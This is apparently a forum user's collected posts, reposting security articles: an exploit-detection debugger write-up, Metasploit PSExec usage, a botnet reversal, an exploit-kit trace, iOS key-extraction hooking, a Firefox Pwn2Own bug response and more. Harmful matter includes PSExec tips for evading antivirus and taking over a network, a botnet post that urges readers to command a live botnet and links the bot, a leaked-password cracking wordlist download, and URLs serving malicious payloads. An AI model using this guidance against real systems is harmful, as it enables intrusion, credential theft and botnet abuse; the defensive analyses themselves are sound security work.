Everything posted by Nytro

  1. Welcome to a world through Glass. It's surprisingly simple. Say "take a picture" to take a picture. Record what you see. Hands-free. Even share what you see. Live. Directions right in front of you. Speak to send a message. Ask whatever's on your mind. Translate your voice. Answers without having to ask. Strong and light. Evolutionary design. Charcoal, Tangerine, Shale, Cotton, Sky. See how Glass feels. Video: http://www.google.com/glass/start/how-it-feels/
  2. [h=3]Using a Custom VDB Debugger for Exploit Analysis[/h]

By @darkrelativity on February 14, 2013

Analyzing an exploit and understanding exactly how it lands can take a long time with inadequate analysis tools. One way to speed up understanding how an exploit behaves is to use Vtrace and VDB. In this post I explain how to create a custom VDB debugger in order to detect, analyze, and prevent execution of an exploit payload.

Background on Vtrace, VDB, the vulnerability and the exploit

Vtrace is a cross-platform and cross-architecture debugging API. VDB is a cross-platform and cross-architecture debugger that uses Vtrace. Both tools are available at http://visi.kenshoto.com. To illustrate why you may want to use VDB and Vtrace to create a custom debugger, I'll use the NVIDIA exploit released on December 25th, 2012 on the full disclosure mailing list. (See Full Disclosure: Exploit for NVidia nvvsvc.exe for the exploit itself.) Thanks to @peterwintrsmith for providing me a fun bug and a good example to demonstrate a few capabilities of Vtrace and VDB.

Without going into too much detail about the exploit: the NVIDIA driver installation package installs a service with description 'NVIDIA Driver Helper Service' and service name 'NVSvc'. The service executable points at '%systemroot%\system32\nvvsvc.exe'. When the service is started, 'nvvsvc.exe' creates or uses an existing named pipe at '\\.\pipe\nvsr'. Next, the service waits for a client to connect to the named pipe. When a client connects, the service spawns a thread to read data from the pipe. There are different types of messages a client can send to the pipe; the message type is specified in the first two bytes of the message. The exploit targets the state machine of the message processing code that parses messages with opcode 0x52. This message format appears to allow clients to send a Unicode registry key name and registry key value. The parts of the message relevant to the exploit are:

- Opcode (message type)
- Registry Key Name
- Registry Key Value Size
- Registry Key Value

There are at least two problems with the 'NVSvc' service. The first problem is the permissions on the named pipe. Figure 1 shows the permissions of the named pipe; FILE_ALL_ACCESS indicates that anyone can send messages to the pipe.

Figure 1: Using accesschk to show 'nvsr' pipe permissions

Reviewing the disassembly reveals why the pipe permissions are wide open; the code creates the 'nvsr' named pipe with a NULL DACL that allows anyone to read and write to it. The second problem is how 'nvvsvc.exe' handles messages with opcode 0x52; pseudocode for it is in Figure 2. Figure 2 shows how the message processing code determines the message type from the opcode in the message, uses wcsnlen to obtain the length of the registry key name, and subsequently uses that length to index into the message and retrieve the registry key value size. Next, the registry key value size is used, unchecked against the destination buffer size, in a memmove operation. The memmove is performed between two fixed-length local buffers allocated on the stack. After the memmove, the code writes data copied from the local buffer back to the pipe, again using the unchecked registry key value size.
As described in the attachment to the email on the full disclosure list, the positioning of the two buffers in memory allows for memory disclosure, dynamically determining the version of the 'nvvsvc' binary, dynamically determining ROP gadgets, and ultimately, gaining code execution.

Figure 2: Pseudocode for the second problem

Writing a Custom VDB Debugger to Detect and Analyze the Exploit

The purpose of writing this custom VDB debugger is to demonstrate one way to detect and analyze an exploit. This section walks through figuring out how to detect and analyze the NVIDIA exploit released by @peterwintrsmith. How can we detect that these vulnerabilities are being exploited? For this post, I assume that ANY time the program counter goes into a memory map that is NOT backed by a file, that is "a bad thing." Therefore, if the program counter ends up in the heap, stack, or another allocated region that is not backed by a file, I want to know about it. Other software, such as OllyDbg, allows the user to break when the program counter is outside or inside a certain range of memory; game protection engines also use this technique to try and restrict hackers from arbitrarily calling 'protected' methods from injected code. [1] These methods differ because they do not make a distinction between file-backed and non-file-backed memory maps.

In order to analyze the exploit, I needed to find the vulnerable binaries, compile the exploit and get everything working. My procedure is documented in the following list:

- Grabbed the 64-bit driver package from NVIDIA (version 310.70) on a 64-bit system; double-clicked and extracted, but did not install the package (so I didn't need an actual NVIDIA graphics card on the test system)
- Navigated into the 'Display.Driver' directory, right-clicked and extracted (with 7-Zip or similar) 'NvCplSetupInt.exe'
- At an administrator command prompt, changed directory into the extracted directory for 'NvCplSetupInt.exe', and performed 'nvvsvc.exe -install'
- Copied the nvvsvc.exe binary to c:\windows\system32
- Used services.msc or 'net start nvsvc' to start the service
- Downloaded the exploit and redefined the shellcode payload; I made mine a bunch of 0x90s and a single 0xcc breakpoint; compiled the exploit
- Ran the exploit and made sure it worked

Next I extended the stalker subsystem inside of Vtrace and VDB to implement detection of code executing in non-file-backed memory maps. If you haven't used the stalker subsystem before, it performs dynamic disassembly at user-specified entry points and sets new breakpoints on the first instruction of each basic block discovered. Depending on the type of instruction, the breakpoint is removed after being hit the first time. In addition, dynamic branch instructions in basic blocks get a 'special' breakpoint called a StalkerDynBreak. When hit, the targets of the dynamic branches are computed and new stalker entrypoint breakpoints are set on those targets. This is a partial description of stalker, but the minimum required to understand the rest of the post; review the stalker code and see the wiki at visi.kenshoto.com for more. If you think about the goal, you might wonder why stalker doesn't already detect execution in non-file-backed memory maps. Stalker was designed to work for 'well formed' code, not code that manually messes with the stack to alter control flow.
The issue is that return instructions do not have stalker breakpoints set on them; stalker assumes that if a disassembled basic block contains a call, then at some point later the program counter will return to the instruction after the call, and eventually hit another basic block that stalker already set a breakpoint on. The NVIDIA exploit manipulates the stack directly to indirectly alter control flow; therefore, I needed to make stalker model all jmp and return instructions as dynamic stalker breakpoints. To do this, I created a new type of stalker break called a 'StalkerRetBreak'. Below is the relevant code for the 'StalkerRetBreak' class.

Figure 3: Code for StalkerRetBreak class

The 'StalkerRetBreak' breakpoint reads the return value off the stack and sets a new stalker breakpoint at that address. Therefore, if anything during execution of the function manipulated the return value, stalker will still 'see' the control flow transfer. Essentially we've turned return instructions into dynamic stalker breaks. A similar change was required to model jumps; these changes were made directly in the StalkerDynBreak class. See [2] for all of the changes.
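Since the Figure 3 image is not reproduced here, the following is a minimal sketch of the StalkerRetBreak idea written against the public vtrace API. This is not the author's actual patch; the integration with stalker's own bookkeeping is omitted, and the 'keepgoing' flag is the meta variable described later in the post.

import struct
import vtrace

class StalkerRetBreak(vtrace.Breakpoint):
    # Placed on a ret instruction: follow the (possibly tampered) return address.
    def notify(self, event, trace):
        sp = trace.getStackCounter()           # stack pointer at the ret
        raw = trace.readMemory(sp, 8)          # return address on the stack (x64 assumed)
        target = struct.unpack('<Q', raw)[0]
        mmap = trace.getMemoryMap(target)      # (base, size, perms, filename) or None
        if mmap is None or not mmap[3]:        # no map, or the map has no backing file
            print('control flow into a non-file-backed map: 0x%x' % target)
            trace.setMeta('keepgoing', False)  # tell the debugger loop to stop
        # a real implementation would otherwise set a new stalker entry
        # breakpoint at 'target' so control-flow tracking continues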
Next we have to write the code for the automated VDB debugger. Here is the code to do that:

Figure 4: Code for the automated VDB debugger

When the code in Figure 4 is run, it restarts the nvsvc service, attaches to the process, sets the initial stalker breakpoint at the start of the specified function (CreateThread), and 'runs' the debugger. We have a special meta variable that means 'keep going until someone says to stop.' When someone says stop, the code outputs the stalker hits and then runs the script 'disas_hits.py'. The 'keepgoing' variable is set by the StalkerRetBreak: if the breakpoint detects a transition to a non-file-backed memory map, the StalkerRetBreak sets this variable and sends a break to the debugger, which causes the while loop to exit.

You might be wondering what 'disas_hits.py' does. It iterates over each recorded stalker hit and, for each hit, disassembles the first 16 bytes, stopping early if it hits a return instruction. 'disas_hits.py' is responsible for creating the highlighted output at the bottom of Figure 5 that displays the memory map, program counter, and disassembly/gadget. You might wonder why I didn't include the 'disas_hits.py' code in the automated debugger; I wanted to be able to run it from the VDB PyQt GUI as well as in my standalone automated debugger. See the code at [2] for the 'disas_hits.py' source code.

What does the automated debugger output? Figure 5 shows the output after running the automated debugger ('c:\python27\python.exe mydebugger.py') and the exploit:

Figure 5: Output of the automated debugger

Notice that we detected the call to VirtualProtect (which corresponds to a gadget by address), the gadgets specified in the exploit, and the exploit payload that I specified. The gadgets specified in the exploit are in Figure 6.

Figure 6: ROP gadgets in the source code of the exploit

The exploit 'payload' is not executed (but the ROP gadgets still are) since we detected the control flow transfer into the non-file-backed memory map; we just print out what *would* have executed for reference. See [2] for a ZIP that contains the source code and the patch against the public release of vdb_20121228. Interested in more posts on VDB/Vtrace/vivisect? Leave me a comment or DM me @darkrelativity.

[1] Checking if a function is called from outside the code segment [Archive] - GameDeception - A Development Site for Reverse Engineering
[2] https://sites.google.com/site/mvdbcode/

Sursa: https://www.mandiant.net/blog/custom-vdb-debugger-exploit-analysis/
  3. SSLStrip-for-Android

SSLStrip for Android. This project is a port of SSLStrip (https://github.com/moxie0/sslstrip), plus the NanoHTTPD and Arpspoof for Android libraries.

How to build:
1). Go to the libs folder, run ndk-build, and copy arpspoof to res/raw/arpspoof
2). Compile this eclipse project as usual!

PS: For research purposes only. Please do not abuse this software.

Sursa: https://github.com/crazyricky/SSLStrip-for-Android
  4. [h=1]PSExec Demystified[/h]

Posted by thelightcosine in Metasploit on Mar 9, 2013 10:28:33 AM

Multiple modules inside the Metasploit Framework bear the title PSExec, which may be confusing to some users. When someone simply refers to "the PSExec module", they typically mean exploit/windows/smb/psexec, the original PSExec module. Other modules are more recent additions, and make use of the PSExec technique in other ways. Here's a quick overview of what these modules are for:

[TABLE=width: 437]
[TR][TD]Metasploit Module[/TD][TD=width: 118]Purpose[/TD][TD=width: 149]Comment[/TD][/TR]
[TR][TD=width: 171]exploit/windows/smb/psexec[/TD][TD=width: 118]Evading anti-virus detection[/TD][TD=width: 149]The service EXE is now getting caught by most AV vendors. Use custom templates or the MOF upload method to circumvent AV detection.[/TD][/TR]
[TR][TD=width: 171]exploit/windows/local/current_user_psexec[/TD][TD=width: 118]Local exploit for a local administrator machine, with the goal of obtaining a session on a domain controller[/TD][TD=width: 149]Great starting point to take over an entire network. The attack is less likely to get noticed because it uses legitimate access methods.[/TD][/TR]
[TR][TD=width: 171]auxiliary/admin/smb/psexec_command[/TD][TD=width: 118]Run arbitrary commands on the target without uploading payloads.[/TD][TD=width: 149]Unlikely to be detected by AV, but limited because you can only send one command, not obtain a session.[/TD][/TR]
[TR][TD=width: 171]auxiliary/scanner/smb/psexec_loggedin_users[/TD][TD=width: 118]Get a list of currently logged in users[/TD][TD=width: 149]Run this module against all targets to get tons of information on your targets.[/TD][/TR]
[/TABLE]

We'll now look at each one in detail below. First, let's talk about what PSExec is, and where the idea comes from.

[h=2]The PSExec Utility[/h]

The name PSExec comes from a program by the same name. Mark Russinovich wrote this utility as part of his Sysinternals suite in the late 90s to help Windows administrators perform important tasks, for example to execute commands or run executables on remote systems.

The PSExec utility requires a few things on the remote system: the Server Message Block (SMB) service must be available and reachable (e.g. not blocked by a firewall); File and Print Sharing must be enabled; and Simple File Sharing must be disabled. The Admin$ share must be available and accessible. It is a hidden SMB share that maps to the Windows directory and is intended for software deployments. The credentials supplied to the PSExec utility must have permissions to access the Admin$ share.

PSExec has a Windows Service image inside of its executable. It takes this service and deploys it to the Admin$ share on the remote machine. It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API and turns on the PSExec service on the remote machine. The PSExec service then creates a named pipe that can be used to send commands to the system.

[h=2]The PSExec Exploit (exploit/windows/smb/psexec)[/h]

The PSExec exploit module in Metasploit runs on the same basic principle as the PSExec utility. It can behave in several ways, many of them unknown to most users.

[h=3]The Service EXE[/h]

In this method, the exploit generates and embeds a payload into an executable, a Service image uploaded in the same way the PSExec utility uploads its service.
The exploit then uploads the service executable to the Admin$ share using the supplied credentials, connects to the DCE/RPC interface, and calls into the Service Control Manager, telling SCM to start the service that we deployed to Admin$ earlier. When the service is started, it starts a new rundll32.exe process, allocates executable memory inside that process and copies the shellcode into it. It then calls the starting address of that memory location as if it were a function pointer, executing the stored shellcode.

The service EXE is generated using an executable template with a placeholder where the shellcode is inserted. The default executable templates in the Metasploit Framework are flagged by major AV solutions because most anti-virus vendors have signatures for detecting them. No matter what payload you stick in this executable template, it will get flagged by AV.

[h=4]AV Evasion[/h]

The PSExec exploit has several advanced options. The first is the option to supply an alternative executable template. There are two separate settings: set EXE::Path tells Metasploit to look in a different directory for the executable templates, and set EXE::Template is the name of the executable template file to use. If you create an executable template and store it in a different directory, you will need to set both of these options. Writing a custom executable template is a good way to avoid AV detection. If you write your own EXE template for the PSExec exploit, it must be a Windows service image.

In addition to writing a custom executable template, you can write an entire executable on your own. This means that a Metasploit payload will not actually get inserted; you code the entire behavior into the EXE itself. The psexec exploit module will then upload the EXE and try to start it via SCM.

Tip: If you would like to save time evading anti-virus, you can use the dynamic executable option in Metasploit Pro, which generates random executable files each time that are much less likely to be detected by anti-virus. (Watch my webcast Evading Anti-virus Detection with Metasploit for more info.)

[h=3]The Managed Object Format (MOF) upload method[/h]

MOF (Managed Object Format) files are a part of Windows Management Instrumentation (WMI). They contain WMI information and instructions. MOF files must be compiled to work properly; however, there is a way around that on Windows XP: if you drop an uncompiled MOF file in the system32\wbem\mof\ directory, Windows XP will compile the MOF for you and run it. The PSExec exploit has a method for using this to our advantage. If you set MOF_UPLOAD_METHOD to true, it will do a few things differently. Our payload EXE will be generated as a normal EXE instead of a service EXE. It will be uploaded via Admin$ as expected, then a MOF file that executes the uploaded EXE is generated and deployed via Admin$ to the MOF directory. Windows XP will then compile and run the MOF, causing our payload EXE to be executed. The MOF method can be combined with the custom EXE or custom template methods described above to try and evade AV as well. The MOF method currently only works on Windows XP, as later versions require the MOF to already be compiled in order to run.
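Pulling the options above together, a run of the psexec exploit with a custom template might look like the following msfconsole session. This is a sketch: the host, credentials, paths and payload values here are placeholders, not values from the original post.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.0.2.15
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > set SMBPass s3cr3tpass
msf exploit(psexec) > set EXE::Path /home/user/templates
msf exploit(psexec) > set EXE::Template my_service_template.exe
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.0.2.2
msf exploit(psexec) > exploit

The EXE::Path and EXE::Template settings are the advanced options described above; everything else is the module's standard usage.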
[h=2]The PSExec Current User Local Exploit (exploit/windows/local/current_user_psexec)[/h]

The Current User PSExec module is a local exploit, meaning it runs on an already established session. Let's set up a scenario to explain how this works. In our scenario you do the following:

- Set up a browser exploit at some address
- Trick a local system administrator into visiting the site
- Get a reverse Meterpreter shell inside the administrator's browser process
- Run netstat to see if the administrator is connected to one of the domain controllers

So now Meterpreter is running on a system administrator's box under her user context. While there may not be anything you're interested in on her workstation, she has permission to access a domain controller (DC), which you would like to shell. You don't have her credentials, and you cannot talk directly to the DC from your box. This is where the current_user_psexec module comes in.

This local exploit works the same way as the psexec exploit; however, it runs from the victim machine, and you do not supply any credentials. The exploit takes the authentication token from the user context and passes it along. This means you can get a shell on any box the user can connect to from that machine and has permissions on, without actually knowing her credentials. This is an invaluable technique to have in your toolbox: from that first machine you can compromise numerous other machines, without having set up any proxy or VPN pivots, and you will have done it using legitimate means of access.

[h=2]The PSExec Command Execution Module (auxiliary/admin/smb/psexec_command)[/h]

Submitted by community contributor Royce @R3dy__ Davis, this module expands upon the usefulness of the PSExec behavior. It utilizes the same basic technique but does not upload any binaries. Instead it issues a single Windows command to the system, which the remote system then runs. This allows arbitrary commands to be executed on the remote system without sending any payloads that could be detected by AV. While it does not get you a shell, it will allow you to perform specific one-off actions on the system that you may need.

[h=2]The PSExec Logged In Users Module (auxiliary/scanner/smb/psexec_loggedin_users)[/h]

Also brought to you by Royce @R3dy__ Davis, this module is a specialized version of the command execution one. It uses the same technique to query the registry on the remote machine and get a list of all currently logged-on users. It is a scanner module, which means it can run against numerous hosts simultaneously, quickly getting the information from all the targeted hosts.

[h=2]Summary[/h]

What we've seen here is that the PSExec technique is actually a relatively simple mechanism with immense benefit. We should all remember to thank Mark Russinovich for this wonderful gift he has given us. As time goes by, people will find many more uses for this same technique, and there is room for improvement in how these modules work and interact. The PSExec exploits are two of the most useful, and most reliable, techniques for getting shells in the entire Metasploit Framework.

Sursa: https://community.rapid7.com/community/metasploit/blog/2013/03/09/psexec-demystified
  5. Retrieving Crypto Keys via iOS Runtime Hooking

Tuesday, March 5, 2013 at 8:45AM

I am going to walk you through a testing technique that can be used at runtime to uncover security flaws in an iOS application when source code is not available, and without having to dive too deeply into assembly. I am going to use a recent example of an iOS application I reviewed, which performed its own encryption when storing data onto the device. These types of applications are a lot of fun to look at due to the variety of insecure ways people implement their own crypto.

In this example the application required authentication, then pulled down some data and stored it encrypted on the device for caching. The data was presented to the user, who could "act" upon it. Sounds pretty generic, but hopefully the scenario is familiar to those who assess mobile apps.

Upon analyzing the application traffic, it was obvious that no crypto keys were being returned from the server. After sweeping the iOS Keychain and the entire application container, I could make the educated assumption that the key is either a hardcoded value or derived using device-specific information. Using the Hopper Disassembler (available on the Mac App Store), I was able to see that the application was leveraging the Common Crypto library for its encryption. I checked the cross-references for calls to the CCCryptorCreate function in order to find the code areas which perform encryption. The following screenshot shows getSymmetricKeyBytes being called right before the CCCryptorCreate function. I felt pretty confident that the purpose of the getSymmetricKeyBytes method was to return the symmetric key used for encryption.

I decided to create a Mobile Substrate tweak in order to hook into getSymmetricKeyBytes and read the return value. I used the class-dump-z tool to get a listing of all the exposed Objective-C interfaces. From here it is easy to get more detailed information about the method, such as the class name, return type and any required parameters. The following is a short snippet retrieved from the class-dump-z results.

@interface SecKeyWrapper : XXUnknownSuperclass {
    NSData* publicTag;
    NSData* privateTag;
    NSData* symmetricTag;
    unsigned typeOfSymmetricOpts;
    SecKey* publicKeyRef;
    SecKey* privateKeyRef;
    NSData* symmetricKeyRef;
}
[..snip..]
-(id)getSymmetricKeyBytes;
-(id)doCipher:(id)cipher key:(id)key context:(unsigned)context padding:(unsigned*)padding;
[..snip..]

We can quickly create a tweak by using the Theos framework. The tweak in this case looked as follows:

%hook SecKeyWrapper
- (id)getSymmetricKeyBytes {
    NSLog(@"HOOKED getSymmetricKey");
    id theKey = %orig;
    NSLog(@"KEY: %@", theKey);
    return theKey;
}
%end

%ctor {
    NSLog(@"SecKeyWrapper is created.");
    %init;
}

It doesn't do much more than read the return value of the original method call and write it out to the console. It was possible to confirm that a static key was being used by running the tweak on another iPad and observing that the same symmetric key was returned.

The next step was to decrypt the files. We could hook into the doCipher:key:context:padding method and just print out the first parameter to get the plaintext data. That would work, but it wouldn't be reproducible on demand, since the tweak code only executes when the application itself calls doCipher:key:context:padding. A quick Google search on the SecKeyWrapper class turned up the following sample code from Apple.
Sursa: GDS Blog - Retrieving Crypto Keys via iOS Runtime Hooking
  6. [h=1]A BIG password cracking wordlist[/h]

Defuse Security have released the wordlist used by their Crackstation project. It really is something.

The numbers? 4.2 GiB compressed. 15 GiB uncompressed. 1,493,677,782 words.

It's a mix of:
- every wordlist, dictionary, and password database leak
- every word in the Wikipedia databases (pages-articles, retrieved 2010, all languages)
- lots of books from Project Gutenberg
- the passwords from some low-profile database breaches that were being sold in the underground years ago

I was in the process of doing this for my own stuff too, mixing all of the password database leaks along with pr0n password dumps, so yeah, these guys saved me a lot of work. I don't really know how this wordlist compares to UNIQPASS v11, but that's something for someone else to find out. Now.. on to hashcat for some tests.

P.S: A guide on using hashcat will follow sometime in the near future ;p

Torrent Download: Download A BIG password cracking wordlist Torrent | 1337x.org

Sursa: A BIG password cracking wordlist | 57un
  7. [h=1]Reversing a Botnet[/h]

Howdy fellow crackers and hackers alike! Have I got a treat for you? A live botnet. The other day at work, I encountered a number of machines all attacking other hosts. Normally it's just one machine, but this time there were several. We isolated the exe responsible because it was eating up 100% CPU (not exactly subtle). I was curious about what made it tick, so I disassembled it, and this is what I found. Normally where I work, we're hit by botnets and never get to catch them in the act, as tracking down the mothership is difficult.

First things first, I want to know more about the executable, like whether it's packed. As the picture shows, the executable is NOT packed, rather just your standard run-of-the-mill PE (Portable Executable) file. The two extra sections highlighted tell us the type of compiler used – GCC for Windows, aka MinGW, meaning either Code::Blocks or Dev-C++ was used. I say this because the .bss and .idata sections are specific to GCC and remind me of ELF (Executable and Linkable Format) used by Linux. Since I don't want to join said botnet, I'm sticking to static analysis.

Opening the thing up in IDA, we find exactly what kind of malware we're dealing with – amateurish. The strings are not encoded, nor are they hidden. The first thing I noticed was the IP address. For those curious, a quick search on ARIN reveals the IP address as belonging to some collocation service in Atlanta: http://whois.arin.net/rest/net/NET-199-229-248-0-1/pft

The next thing we see is the channel name #test (more on that in a sec), then the passwords. The 'Operation Dildos' name suggests that our malware writers are either 14, or immature. I still chuckled though. The next thing I determined was the type of bot we were dealing with. Scrolling further through revealed IRC instructions. You've read RFC 1459, right? JOIN, PING, PONG, NICK, PRIVMSG – these are all IRC commands. Further inspection of the bot revealed the commands that can be issued to it by its master:

- 'help' – derp.
- 'version' – derrrr.
- 'speedtest' – Perform a speed test via a web request to 68.11.12.242, which traces to Louisiana. I have a feeling our malware writer lives in that area, because the botnet server resides in Georgia. Just a guess.
- 'exec' – Execute a command.
- 'dle' – Download and execute a file.
- 'udp' – Do a UDP flood.
- 'openurl' – Open a hidden window of a URL.
- 'syn' – Do a SYN flood.
- 'stop' – Stops execution.

If you're curious how the bot performs the lookup on the command, here it is. What you can't see is the stub at the top which belongs to the subroutine responsible for the IRC connection to the server. The next thing I found scrolling through was the error handler data section – messages sent to alert the master that a given command completed. The last thing in this reversing session I'd like to point out is just before the command listing – the password check. The assembly instruction 'repne scasb' is a string operation: it scans a string for the byte in AL (here, NULL), decrementing ECX (the extended counter register) for each character. I see it primarily with string comparison operations.

Enough about the bot itself, let's learn more about the botnet. A quick ping shows us it's still online. Connecting to it seems to work, so it's still operational. The botnet itself seems to be growing, because when I looked last night, there were only 400 hosts.
Checking now, I see 'There are 3 users and 1131 invisible on 2 servers'. When I connected, I was called out within minutes by the server admin, whom I had also seen the first time I connected. Since I don't want to throw rocks at a hornet's nest (and get my server DDOS'd off the net), I decided not to pursue it further. My readers, on the other hand: go nuts. You have the password to issue commands, you have the IRC server address, and you have the channel where the bots reside (#test). Perhaps I may try again tonight at like 1 am when the admins are probably asleep. Until then, keep on cracking. For those of you who are curious, you can download the bot here, complete with an IDA 6 compatible db file: The Bot.

Sursa: Reversing a Botnet
  8. [h=1]CVE-2013-1493 (jre17u15 - jre16u41) in Cool EK[/h]

That was fast (4 days after patch). After CVE-2013-0634 (Flash), it's now CVE-2013-1493 (the last known vulnerability up to jre17u15 - jre16u41) that reaches Cool Exploit Kit (from the Reveton distributor - btw this ransomware seems to be clothed again in what I called the Winter II design).

Credits first: Will Metcalf from Emerging Threats for the "path" part of the landing. Michael Schierl for confirming (and giving more clues) that it looks like CVE-2013-1493. Chris Wakelin for additional tips. I will update here integration in other exploit kits (it would be surprising if it does not happen... and I will modify the title).

Cool EK:

jre17u15:
[Screenshot: CVE-2013-1493 successful path in Cool EK (jre17u15) 2013-03-08]

jre16u41:
[Screenshot: CVE-2013-1493 successful path in Cool EK (jre16u41) 2013-03-08]

GET http://retrempercircum[...].glamorizesports.com/world/bright_rural_mutter.html 200 OK (text/html)
GET http://retrempercircum[...].glamorizesports.com/world/rug-magistrate.jar 200 OK (application/java-archive) a3410c876ed4bb477c153b19eb396f42
GET http://retrempercircum[...].glamorizesports.com/world/improved_violently_section.swf 404 Not Found (text/html)
GET http://[...]/world/getnn.jpg 200 OK (application/x-msdownload) e343845066df8c271b5ac095f2d44183

Out of scope: Reveton.

Note: if you get infected with Java 1.7u > 10, don't try to say you were not warned!
[Screenshot: Security in jre17u>10. Want to get infected? Follow the bubble]

For Java 1.6... things are different.
[Screenshot: In jre16 (no comment)]

Files: a3410c876ed4bb477c153b19eb396f42 (nothing more for now)

Reading:
YAJ0: Yet Another Java Zero-Day - 2013-02-28 - Darien Kindlund and Yichong Lin - FireEye Blog
CVE-2013-1493 - MITRE
Latest Java Zero-Day Shares Connections with Bit9 Security Incident - 2013-03-01 - Symantec

Posted by Kafeine

Sursa: Malware don't need Coffee: CVE-2013-1493 (jre17u15 - jre16u41) in Cool EK
  9. [h=1]Protecting Mozilla Firefox users on the web[/h]

I have followed Pwn2Own ever since its inception in 2007. For those of you who do not know what Pwn2Own is, it is a competition in which hackers try to take advantage of software weaknesses in browsers (Internet Explorer, Firefox, Chrome, Safari etc.): they put up specially crafted webpages and click on them to try and launch another application, usually calc.exe, gaining a monetary reward in return. It usually happens on the sidelines of CanSecWest, a yearly security conference held in Vancouver. During my university days in Singapore on the other side of the world, I always followed this competition with anticipation. I told myself: one day, just one day, I will be at the frontline helping to decipher the problem and helping to get the fix out to Firefox users around the world as soon as possible.

Over the years, a security researcher by the name of Nils took down Firefox in 2009 (bug 484320) and in 2010 (bug 555109), whereas in 2011, nobody took down Firefox. Last year in 2012, I was on-site in Vancouver and I witnessed Willem Pinckaers and Vincenzo Iozzo take down Firefox. However, the bug (720079) was already identified and fixed through internal processes. This year, Pwn2Own became the venue for many exploits against major browsers, including Firefox (bug 848644), as well as plugins which are often used in browsers, such as Flash and Java. The team that took down Firefox this year was VUPEN Security, who also punched holes through Internet Explorer 10, Java and Flash. Some of my colleagues / co-workers were present at the conference and were relaying us information live, while I stayed back at the office preparing my machines to diagnose the issue.

===

The following timeline (all times PST) describes my role behind the scenes with respect to the Firefox exploit by VUPEN, on March 6, 2013:

~3pm: Rumblings heard on IRC channels that Firefox has been moved from its scheduled slot to 5.30pm.
5.30pm: VUPEN gets ready.
~5.54pm: VUPEN takes down Firefox. The on-site team gets to work getting details of the exploit.
~7pm: Bug 848644 gets filed. Looking at the innards of the testcase, together with confirmation from team members over IRC that there was no malicious code present (the Proof of Concept (PoC) code just crashes), I managed to reproduce the crash on a fully-patched Windows 7 system. More analysis from early responders flowed in: information such as the attack vector (Editor) and an ASan stack trace showing the implicated functions (possibly nsHTMLEditRules::GetPromotedPoint). I did a quick stab at the regression range here. Using the bisection technique described here, I found that early January 2012 builds did not crash, whereas early January 2013 builds did crash.

The testcase seemed initially tricky; until it was eventually found (quite a while later) that one could reliably trigger this with one tab that somehow caused the "pop-up blocked" info bar to show, I had to try the testcase repeatedly, sometimes reloading, sometimes closing and reopening the browser to trigger the crash. Using mozregression here might have been a good idea; however, with one incorrect decision about whether a particular build was crashing or not, one would bisect down to an incorrect regression window and waste precious time. Time was of the essence here – the sooner one gets an accurate regression window, the faster a developer can potentially pinpoint the cause of the crash.
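As an aside, the kind of bisection that mozregression automates boils down to an invocation like the following (a sketch; the --good/--bad date flags are from mozregression's CLI, and the dates are the initial window mentioned above). The tool downloads nightlies between the two dates, runs each one, and narrows the window based on whether you report the build as good or bad:

$ mozregression --good=2012-01-01 --bad=2013-01-01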
I found myself repeatedly downloading and checking builds to see whether they crashed. Sometimes the crash happened immediately on load (with the initial PoC); other times it happened only after a few minutes, or only after a restart. I eventually settled on the following regression window: the crash happens on the October 6, 2012 nightly, but not on the previous day's (October 5), and I posted a comment so this could get confirmation from other people. I then immediately looked through the hgweb regression window to see if anything stood out – bug 796839 seemed like a likely cause, but everything else was still a possibility.

Within that regression window, more clues emerged. The ASan stack trace pointed to nsHTMLEditRules::GetPromotedPoint being part of the bigger picture here, and some detective work showed that in the changeset from bug 796839, the file editor/libeditor/html/nsHTMLEditRules.cpp was changed – the very file nsHTMLEditRules::GetPromotedPoint was located in. Coincidence? Probably. However, this made everything more likely. At this point in time, it was 8pm, approximately one hour from the point at which the testcase was obtained. I began to consider (and eventually discount) other possibilities, including bug 795610. Thanks to great work by Nicolas Pierron and his git wizardry, we found that nsHTMLInputElement::SetValueInternal (also implicated in the ASan stack trace) existed in nsHTMLInputElement.cpp, which was modified in that bug. However, this possibility was quickly discounted.

At this point, I was able to get independent verification that the regression window (Oct 5 – Oct 6) was indeed correct. Further checking showed that our Extended Support Release (ESR) builds on version 17 were also affected. This made bug 796839 extremely likely to be the root cause, because it landed on mozilla-central during the version 18 nightly window, but was backported to mozilla-aurora at that time, which was the version 17 branch. Bug 796839 would encompass the patch landing that inadvertently opened up a vulnerability in Firefox. Independent confirmation of this regressor came at 9pm. Within 2 hours, we had gone from having a PoC testcase with no idea what was affected, to knowing which patch caused the issue. I thus nominated the fix to be landed on all affected branches.

By about 10pm, the fix was put up for review. After that, lots of great work by various people/teams went towards quick approvals, landing of the fix, and QA verification. Overnight, builds were created, and by late morning the next day the advisory was prepared, with QA about to sign off on the new builds. At 4pm, a new version of Firefox (19.0.2) was shipped with the fix.

===

Credit must be given to the other Mozilla folks in this effort, who have, outside of normal day working hours, worked till late night to make this possible. I am proud to be part of this fabulous team effort. It certainly has been my honour to have helped keep Mozilla users safe on the web.

Sursa: Protecting Mozilla Firefox users on the web | It's a Wonderful Life
  10. [h=1]Cryptographic Primitives in C++[/h]

This page walks through the implementation of an easy-to-use C++ wrapper over the OpenSSL crypto library. The idea is to go through the OpenSSL documentation once, make the right choices from a cryptographic point of view, and then hide all the complexity behind a reusable header. The following primitives are typically used in the applications I write:

- Random Number Generation
- Password Based Symmetric Key Generation (PBKDF2/HMAC-SHA-256)
- Message Digests and Authentication Codes (SHA-256 & HMAC-SHA-256)
- Authenticated Encryption with Associated Data (AES-128-GCM)

The wrapper is a single header file that can be included wherever these primitives are needed. It includes OpenSSL and Boost headers and will require linking with the OpenSSL object libraries. Here is a sample and here are the tests.

[h=4]Data Buffers[/h]

Most of the wrapper functions work on blocks of data and we need a way to pass these in and out of the wrapper routines. Any C++ container that guarantees contiguous storage (i.e. std::vector, std::string, std::array, boost::array or a raw char array) can be passed as the argument to any wrapper function that takes a data buffer as a parameter. Having said that, it is best to avoid using dynamic STL containers for storing sensitive data, because it is difficult to scrub them once we're done using the secrets. The implementations of these containers are allowed to reallocate and copy their contents in memory and may leave behind inaccessible copies of sensitive data that we can't overwrite. Simpler containers like boost::array or raw char arrays are better for this purpose. You can also use the following typedef:

namespace ajd {
  namespace crypto {
    /// A convenience typedef for a 128 bit block.
    typedef boost::array<unsigned char, 16> block;
    /// Remove sensitive data from the buffer.
    template<typename C> void cleanse(C &c);

